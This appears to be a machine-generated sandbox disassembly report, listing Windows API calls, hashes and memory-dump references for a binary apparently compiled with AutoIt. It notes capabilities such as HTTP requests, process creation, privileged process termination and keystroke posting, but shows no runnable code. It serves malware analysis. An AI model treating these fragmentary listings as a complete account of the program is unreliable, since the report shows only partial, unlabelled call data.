                                                                                  • API ID: ChildEnumWindows
                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                  • API String ID: 3555792229-1603158881
                                                                                  • Opcode ID: 3b5ca977f8f6b7ca0891d187941ea96b96cd23ed6e396677cf026d3f1f7f67cd
                                                                                  • Instruction ID: 42ebf2e2bbff0452e6724f194638582eb8543fca84b8cf1442b5e4f1cc5bbbfc
                                                                                  • Opcode Fuzzy Hash: 3b5ca977f8f6b7ca0891d187941ea96b96cd23ed6e396677cf026d3f1f7f67cd
                                                                                  • Instruction Fuzzy Hash: 3B918471600606EACB18EF60C581BEEFBB5BF15300F64815AE85BA7391DF306959CBA1
                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00A8327E
                                                                                    • Part of subcall function 00A8218F: GetClientRect.USER32(?,?), ref: 00A821B8
                                                                                    • Part of subcall function 00A8218F: GetWindowRect.USER32(?,?), ref: 00A821F9
                                                                                    • Part of subcall function 00A8218F: ScreenToClient.USER32(?,?), ref: 00A82221
                                                                                  • GetDC.USER32 ref: 00ABD073
                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ABD086
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00ABD094
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00ABD0A9
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00ABD0B1
                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ABD13C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                  • String ID: U
                                                                                  • API String ID: 4009187628-3372436214
                                                                                  • Opcode ID: 705e76d7f300b65678f5ccf545791f288fc8069589672c9109595860a75657c9
                                                                                  • Instruction ID: 12e9c3be6fddc806db09ca1888516be3bf90d4f3da6a6f1f5f7b224e5444841a
                                                                                  • Opcode Fuzzy Hash: 705e76d7f300b65678f5ccf545791f288fc8069589672c9109595860a75657c9
                                                                                  • Instruction Fuzzy Hash: 5871E331404205EFCF21EF68C884AFA7BB9FF59320F144269ED565A1A6EB318D51DF60
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                    • Part of subcall function 00A82714: GetCursorPos.USER32(?), ref: 00A82727
                                                                                    • Part of subcall function 00A82714: ScreenToClient.USER32(00B477B0,?), ref: 00A82744
                                                                                    • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000001), ref: 00A82769
                                                                                    • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000002), ref: 00A82777
                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B0C69C
                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00B0C6A2
                                                                                  • ReleaseCapture.USER32 ref: 00B0C6A8
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00B0C752
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B0C765
                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B0C847
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                  • API String ID: 1924731296-2107944366
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AF211C
                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AF2148
                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AF218A
                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AF219F
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF21AC
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00AF21DC
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00AF2223
                                                                                    • Part of subcall function 00AF2B4F: GetLastError.KERNEL32(?,?,00AF1EE3,00000000,00000000,00000001), ref: 00AF2B64
                                                                                    • Part of subcall function 00AF2B4F: SetEvent.KERNEL32(?,?,00AF1EE3,00000000,00000000,00000001), ref: 00AF2B79
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                  • String ID:
                                                                                  • API String ID: 2603140658-3916222277
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B10980), ref: 00AF9412
                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B10980), ref: 00AF9446
                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AF95C0
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00AF95EA
                                                                                  Similarity
                                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                  • String ID:
                                                                                  • API String ID: 560350794-0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AFFD9E
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AFFF31
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AFFF55
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AFFF95
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AFFFB7
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B00133
                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B00165
                                                                                  • CloseHandle.KERNEL32(?), ref: 00B00194
                                                                                  • CloseHandle.KERNEL32(?), ref: 00B0020B
                                                                                  Similarity
                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4090791747-0
                                                                                  APIs
                                                                                    • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BE0
                                                                                    • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BF9
                                                                                    • Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00AE52FB
                                                                                  • _wcscmp.LIBCMT ref: 00AE5315
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00AE5330
                                                                                  Similarity
                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 793581249-0
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B08D24
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  APIs
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ABC638
                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ABC65A
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ABC672
                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ABC690
                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ABC6B1
                                                                                  • DestroyIcon.USER32(00000000), ref: 00ABC6C0
                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ABC6DD
                                                                                  • DestroyIcon.USER32(?), ref: 00ABC6EC
                                                                                    • Part of subcall function 00B0AAD4: DeleteObject.GDI32(00000000), ref: 00B0AB0D
                                                                                  Similarity
                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                  • String ID:
                                                                                  • API String ID: 2819616528-0
                                                                                  APIs
                                                                                    • Part of subcall function 00ADB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADB54D
                                                                                    • Part of subcall function 00ADB52D: GetCurrentThreadId.KERNEL32 ref: 00ADB554
                                                                                    • Part of subcall function 00ADB52D: AttachThreadInput.USER32(00000000,?,00ADA23B,?,00000001), ref: 00ADB55B
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA246
                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ADA263
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ADA266
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA26F
                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ADA28D
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ADA290
                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ADA299
                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ADA2B0
                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ADA2B3
                                                                                  Similarity
                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2014098862-0
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AD915A,00000B00,?,?), ref: 00AD94E2
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD94E9
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AD915A,00000B00,?,?), ref: 00AD94FE
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00AD915A,00000B00,?,?), ref: 00AD9506
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD9509
                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AD915A,00000B00,?,?), ref: 00AD9519
                                                                                  • GetCurrentProcess.KERNEL32(00AD915A,00000000,?,00AD915A,00000B00,?,?), ref: 00AD9521
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00AD915A,00000B00,?,?), ref: 00AD9524
                                                                                  • CreateThread.KERNEL32(00000000,00000000,00AD954A,00000000,00000000,00000000), ref: 00AD953E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 1957940570-0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                  • API String ID: 0-572801152
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                  • API String ID: 2862541840-625585964
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B07449
                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B0745D
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B07477
                                                                                  • _wcscat.LIBCMT ref: 00B074D2
                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B074E9
                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B07517
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                  • String ID: SysListView32
                                                                                  • API String ID: 307300125-78025650
                                                                                  APIs
                                                                                    • Part of subcall function 00AE4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00AE416D
                                                                                    • Part of subcall function 00AE4148: Process32FirstW.KERNEL32(00000000,?), ref: 00AE417B
                                                                                    • Part of subcall function 00AE4148: FindCloseChangeNotification.KERNEL32(00000000), ref: 00AE4245
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AFF08D
                                                                                  • GetLastError.KERNEL32 ref: 00AFF0A0
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AFF0CF
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AFF14C
                                                                                  • GetLastError.KERNEL32(00000000), ref: 00AFF157
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AFF18C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                  • String ID: SeDebugPrivilege
                                                                                  • API String ID: 1701285019-2896544425
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00AE357C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoad
                                                                                  • String ID: blank$info$question$stop$warning
                                                                                  • API String ID: 2457776203-404129466
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AE4802
                                                                                  • LoadStringW.USER32(00000000), ref: 00AE4809
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AE481F
                                                                                  • LoadStringW.USER32(00000000), ref: 00AE4826
                                                                                  • _wprintf.LIBCMT ref: 00AE484C
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE486A
                                                                                  Strings
                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00AE4847
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                  • API String ID: 3648134473-3128320259
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00B0DB42
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00B0DB62
                                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B0DD9D
                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B0DDBB
                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B0DDDC
                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00B0DDFB
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B0DE20
                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B0DE43
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                  • String ID:
                                                                                  • API String ID: 1211466189-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0044E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 3479070676-0
                                                                                  APIs
                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00A82E9F
                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000,000000FF), ref: 00A82EE7
                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00ABC55B
                                                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00ABC508,00000004,00000000,00000000,00000000), ref: 00ABC5C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AE7698
                                                                                    • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                                                    • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AE76CF
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00AE76EB
                                                                                  • _memmove.LIBCMT ref: 00AE7739
                                                                                  • _memmove.LIBCMT ref: 00AE7756
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00AE7765
                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AE777A
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE7799
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 256516436-0
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 00B06810
                                                                                  • GetDC.USER32(00000000), ref: 00B06818
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B06823
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00B0682F
                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B0686B
                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B0687C
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B0964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00B068B6
                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B068D6
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3864802216-0
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: _memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 2931989736-0
                                                                                  APIs
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                    • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                                                  • _wcstok.LIBCMT ref: 00AEF2D7
                                                                                  • _wcscpy.LIBCMT ref: 00AEF366
                                                                                  • _memset.LIBCMT ref: 00AEF399
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                  • String ID: X
                                                                                  • API String ID: 774024439-3081909835
                                                                                  APIs
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AF72EB
                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AF730C
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF731F
                                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00AF73D5
                                                                                  • inet_ntoa.WSOCK32(?), ref: 00AF7392
                                                                                    • Part of subcall function 00ADB4EA: _strlen.LIBCMT ref: 00ADB4F4
                                                                                    • Part of subcall function 00ADB4EA: _memmove.LIBCMT ref: 00ADB516
                                                                                  • _strlen.LIBCMT ref: 00AF742F
                                                                                  • _memmove.LIBCMT ref: 00AF7498
                                                                                  Similarity
                                                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                  • String ID:
                                                                                  • API String ID: 3619996494-0
                                                                                  APIs
                                                                                  • IsWindow.USER32(014C4E08), ref: 00B0BA5D
                                                                                  • IsWindowEnabled.USER32(014C4E08), ref: 00B0BA69
                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B0BB4D
                                                                                  • SendMessageW.USER32(014C4E08,000000B0,?,?), ref: 00B0BB84
                                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00B0BBC1
                                                                                  • GetWindowLongW.USER32(014C4E08,000000EC), ref: 00B0BBE3
                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B0BBFB
                                                                                  Similarity
